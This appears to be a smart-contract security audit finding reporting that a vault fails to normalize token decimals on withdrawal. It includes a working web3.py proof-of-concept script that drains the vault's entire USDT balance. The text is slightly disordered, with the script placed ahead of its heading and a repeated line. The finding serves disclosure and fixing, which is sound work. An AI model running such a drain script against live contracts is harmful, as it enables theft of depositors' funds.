This is the web3.py script to drain all usdt from the vault.
usdt_balance = usdt.functions.balanceOf(vault.address).call()
print('previous usdt:', usdt_balance)
# We deposit some margin dai to drain all liquidity.
deposit_amount = usdt_balance + usdt_balance
dai.functions.approve(vault.address, deposit_amount).transact()
vault.functions.deposit(dai.address, deposit_amount).transact()
print('amount of share:', vault.functions.balanceOf(user).call())
vault.functions.withdrawAll(usdt.address).transact()
## usdt would left zero
print('usdt left:', usdt.functions.balanceOf(vault.address).call())
Handle
jonah1005
Vulnerability details
Impact
The vault does not normalize decimals when a user withdraws the token. When a user has 100e18 shares, he can withdraw all usdc/ usdt from the token.
The liquidity of USDC/USDC would be drained. I consider this is a high-risk issue.
Proof of Concept
Vault.sol#L232-L261
This is the web3.py script to drain all usdt from the vault.
Tools Used
None
Recommended Mitigation Steps
Normalize decimals on withdrawing.